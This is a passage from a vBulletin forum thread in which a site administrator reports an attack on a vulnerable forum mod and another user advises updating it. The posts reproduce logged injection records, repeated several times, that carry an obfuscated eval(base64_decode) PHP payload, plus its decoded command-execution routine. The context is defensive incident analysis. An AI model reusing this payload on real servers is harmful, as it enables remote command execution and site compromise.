0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 9f0427858f5c797717a3aaf69e082c01 | 207.58.131.77 | Mozilla/3.0 (X11; I; SunOS 5.4 sun4m) | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| c1d576eaa0bf6e9b1867413a940cf56a | 207.58.131.77 | Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7 | 1300883385 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| c3f76c51b678d379c20cbbc5580e20ad | 80.38.87.254 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1301251374 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| 85fbda11bb0d353a5b4db40ad309b0dc | 88.80.207.132 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b | 1301678740 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| f7b4a57131b4887a2a1eea92376e9697 | 205.204.32.194 | Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320) | 1302083349 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |
| f8b72c4b4b12138accc7f62c2692ce98 | 183.99.33.109 | Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) | 1305032315 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"
PHP Code:
eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die(); 
";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i :0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0: "";} |



One way people make mass chances of that nature is to use a mass defacer script. In part the code I removed from the database did allow for php or shell commands to be executed without placing files into the account.

One occurrence was at: Tue May 10 07:58:35 CDT 2011 by this IP: 183.99.33.109
Code:
  
  echo "v0pCr3w
  ";
  echo "sys:".php_uname()."
  ";
  $cmd="echo nob0dyCr3w";
  $eseguicmd=ex($cmd);
  echo $eseguicmd;
  function ex($cfe){
  $res = '';
  if (!empty($cfe)){
  if(function_exists('exec')){
  @exec($cfe,$res);
  $res = join("\n",$res);
  }
  elseif(function_exists('shell_exec')){
  $res = @shell_exec($cfe);
  }
  elseif(function_exists('system')){
  @ob_start();
  @system($cfe);
  $res = @ob_get_contents();
  @ob_end_clean();
  }
  elseif(function_exists('passthru')){
  @ob_start();
  @passthru($cfe);
  $res = @ob_get_contents();
  @ob_end_clean();
  }
  elseif(@is_resource($f = @popen($cfe,"r"))){
  $res = "";
  while(!@feof($f)) { $res .= @fread($f,1024); }
  @pclose($f);
  }}
  return $res;
  }
Reply With Quote
  #40  
Old 05-14-2011, 12:44 AM
A Dead Puppie A Dead Puppie is offline
 
Join Date: Oct 2009
Posts: 91
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Anyone who was using the old version of the Advanced Forum Rules mod, any version, could/was suspect to hackers. There is a fixed update somewhere. Best thing to do is uninstall the mod, remove all files from the server, and re-upload the updated version.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 12:56 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.06406 seconds
  • Memory Usage 2,347KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_code
  • (21)bbcode_php
  • (4)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (4)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete